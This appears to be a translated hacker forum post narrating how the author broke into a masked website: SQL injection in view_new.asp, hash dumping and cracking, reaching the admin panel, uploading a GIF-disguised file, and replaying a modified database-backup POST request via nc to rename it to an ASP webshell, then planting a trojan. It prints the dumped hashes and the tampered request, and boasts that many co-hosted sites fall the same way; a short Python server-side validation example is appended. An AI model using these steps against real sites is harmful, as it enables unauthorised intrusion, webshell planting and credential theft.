Getting a webshell by capturing and modifying the backend database backup request

Source: Internet
Author: User


http://www.xxxxxx.com/


The site looks decent, but it's messy.
Click a link: http://www.xxxxxx.com/view_new.asp?id=204&cid=24
Appending and 1=1 and and 1=2 seems to be filtered; both return the normal page.
Remove "&cid=2" and press enter again to test and 1=1 and and 1=2.
Different pages come back, which confirms the injection vulnerability exists.


This vulnerability is a simple one, so I threw it straight into Domain to guess.
It's an Access database. Guessing further: (pasting the tool output here, otherwise the post doesn't have enough characters!)
==========================================================
Congratulations, this URL can be injected!
Database Type: Access Database
Tip 1: All table names have been guessed!
Tip 2: All column names have been guessed!
Range: 5 Records in total!
Password: 4139bf7cbbc3a1fb
Password: 4139bf7cbbc3a1fb
Password content: e034b3929bbe2d5b
Password content: ef58d7605c06bb3a
Password: f77f6b2d4ed4a2f0
All detection completed!
========================================================
Took the first hash to xmd5.org. My luck was good and it had a record: 195802.
Couldn't wait to scan for the backend; luck kept going up and it turned up right away.
http://www.xxxxxx.com/admin/
Entered admin with password 195802 and the page is blank? The address is admin/login.asp.
Did the administrator delete login.asp to make things harder?
No worry, use Wwwscan to scan the backend directory.
Got http://www.xxxxxx.com/admin/left.htm
The navigation bar shows up!


Have a play!
Add an article first. The upload function is available.
After modifying the header, add gif89a and change the suffix to .gif. Uploaded successfully!
The returned URL is ../userpic/201012514755680.gif.


Now that the navigation bar is there, check the database backup function.
http://www.xxxxxx.com/admin/dbback.asp
The path cannot be modified!



As a newbie, I was about to sigh and give up when I suddenly remembered that this kind of database backup restriction is supposed to be broken by capturing and modifying the packet!
Try capturing the packet with Winsock.


The captured packet is:
==============================================================

POST /admin/dbback.asp?Action=return HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.xxxxxx.com/admin/dbback.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 665; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; http://bsalsa.com); CBA; .NET CLR 2.0.50727; .NET CLR 3.0.20.6.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: www.xxxxxx.com
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQABDDRCD=GAGLCDDBNNDBALIBKBGPNNKG

currf=date%2Fdata.asp&backf=dbback&backfy=backup.mdb&Submit=%B1%B8%B7%DD

==============================================================

The path and file name appear at the end!
The image address is obtained through the URL signature: 2e00002e00002fuserpic00002f201012514755680.gif.
Change backup.mdb to safe.asp.
Then look at the length and change it to 93.
The modified packet is as follows:
==============================================================

POST /admin/dbback.asp?Action=return HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.xxxxxx.com/admin/dbback.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 665; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; http://bsalsa.com); CBA; .NET CLR 2.0.50727; .NET CLR 3.0.20.6.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: www.xxxxxx.com
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Secure&backf=dbback&backfy=safe.asp&Submit=%B1%B8%B7%DD

==============================================================

Check the port: 20480

Bring out the ghost weapon, nc!
Run nc from cmd: nc www.xxxxxx.com 20480 < nc.txt (nc.txt holds the packet)
Wait a moment.
Open the small shell ("pony") address: http://www.xxxxxx.com/admin/dbback/safe.asp
Oh, the webshell is ready!
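The lesson of the backup step above is that "the path cannot be modified" was only enforced in the form, so the server accepted whatever file name arrived in backfy. As an added example (not code from the original post), here is the kind of server-side check the dbback.asp handler needed, in Python: the weak check mirrors what the form effectively enforced, the strict check pins the folder and requires a bare <name>.mdb file name. The field names currf, backf and backfy come from the captured request; the constructed bodies and the hypothetical function names are assumptions.

```python
"""Server-side validation for a database-backup form (added example).

Field names (currf, backf, backfy) are taken from the captured request in
the post; the sample bodies below are constructed for this example.
"""
import re
from urllib.parse import parse_qs

# Constructed sample bodies: the original request and the modified one.
ORIGINAL_BODY = "currf=date%2Fdata.asp&backf=dbback&backfy=backup.mdb&Submit=%B1%B8%B7%DD"
MODIFIED_BODY = "currf=date%2Fdata.asp&backf=dbback&backfy=safe.asp&Submit=%B1%B8%B7%DD"

BACKUP_DIR = "dbback"  # the only folder a backup may ever be written to
# A bare file name: letters, digits, "_" or "-", then exactly ".mdb".
# This rejects path separators, "..", NUL bytes, ";" and double extensions.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}\.mdb$")


def parse_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body (GBK bytes kept as latin-1)."""
    fields = parse_qs(body, keep_blank_values=True, encoding="latin-1")
    return {key: values[0] for key, values in fields.items()}


def weak_validate(fields: dict) -> bool:
    """What the form effectively enforced: only the folder is fixed (hypothetical)."""
    return fields.get("backf", "") == BACKUP_DIR


def validate_backup(fields: dict) -> tuple:
    """Return (True, '') when the request may be served, else (False, reason)."""
    backf = fields.get("backf", "")
    backfy = fields.get("backfy", "")
    if backf != BACKUP_DIR:
        return False, "backup folder is not the fixed dbback directory"
    if not NAME_RE.fullmatch(backfy):
        return False, "backup file name must be <name>.mdb with no path characters"
    return True, ""


if __name__ == "__main__":
    for body in (ORIGINAL_BODY, MODIFIED_BODY):
        fields = parse_body(body)
        print(body.split("&backfy=")[1].split("&")[0],
              "weak:", weak_validate(fields), "strict:", validate_backup(fields))
```

The weak check lets backfy=safe.asp through exactly as in the post; the strict check refuses it, as well as encoded variants such as a NUL byte or a second extension.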


Uploaded a Trojan and checked whether it's running on a VM.
Used rootkit.net.cn to bypass.


A large number of websites are bound to this host!
Looked at the other sites, and almost all of them have the same exploitation process as this vulnerability: injection, guessing, backend (admin/login.asp), image upload, database backup (if you don't have one, you can --)
Injection vulnerabilities are everywhere! I'm not playing anymore ~ it's useless to collect so many webshells from dummies.
There are a lot of these silly vulnerabilities in China, and I'd like to remind webmasters to raise their security awareness! At least filter and 1=1 (-_-!)

Edited by 2h0ngHe [B.H.S.T] and qing
